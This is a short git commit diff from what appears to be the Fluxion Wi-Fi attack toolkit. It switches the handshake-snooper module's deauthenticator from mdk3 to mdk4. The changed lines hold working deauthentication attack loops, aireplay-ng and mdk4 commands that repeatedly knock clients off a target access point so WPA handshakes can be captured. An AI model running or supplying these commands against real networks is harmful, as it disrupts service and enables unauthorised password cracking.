revert mdk3 back to mdk4
This commit is contained in:
parent
67a59708b6
commit
6c2a560bf1
|
@ -168,8 +168,8 @@ handshake_snooper_start_deauthenticator() {
|
|||
|
||||
# Prepare deauthenticators
|
||||
case "$HandshakeSnooperDeauthenticatorIdentifier" in
|
||||
"$HandshakeSnooperMdk3MethodOption")
|
||||
echo "$FluxionTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst ;;
|
||||
"$HandshakeSnooperMdk4MethodOption")
|
||||
echo "$FluxionTargetMAC" > $FLUXIONWorkspacePath/mdk4_blacklist.lst ;;
|
||||
esac
|
||||
|
||||
# Start deauthenticators.
|
||||
|
@ -180,10 +180,10 @@ handshake_snooper_start_deauthenticator() {
|
|||
"while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $FluxionTargetMAC --ignore-negative-one $HandshakeSnooperJammerInterface; done" &
|
||||
HandshakeSnooperDeauthenticatorPID=$!
|
||||
;;
|
||||
"$HandshakeSnooperMdk3MethodOption")
|
||||
"$HandshakeSnooperMdk4MethodOption")
|
||||
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \
|
||||
-title "Deauthenticating all clients on $FluxionTargetSSID" -e \
|
||||
"while true; do sleep 7; timeout 3 mdk3 $HandshakeSnooperJammerInterface d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $FluxionTargetChannel; done" &
|
||||
"while true; do sleep 7; timeout 3 mdk4 $HandshakeSnooperJammerInterface d -b $FLUXIONWorkspacePath/mdk4_blacklist.lst -c $FluxionTargetChannel; done" &
|
||||
HandshakeSnooperDeauthenticatorPID=$!
|
||||
;;
|
||||
esac
|
||||
|
@ -203,7 +203,7 @@ handshake_snooper_set_deauthenticator_identifier() {
|
|||
local methods=(
|
||||
"$HandshakeSnooperMonitorMethodOption"
|
||||
"$HandshakeSnooperAireplayMethodOption"
|
||||
"$HandshakeSnooperMdk3MethodOption"
|
||||
"$HandshakeSnooperMdk4MethodOption"
|
||||
"$FLUXIONGeneralBackOption"
|
||||
)
|
||||
io_query_choice "$HandshakeSnooperMethodQuery" methods[@]
|
||||
|
|
Loading…
Reference in New Issue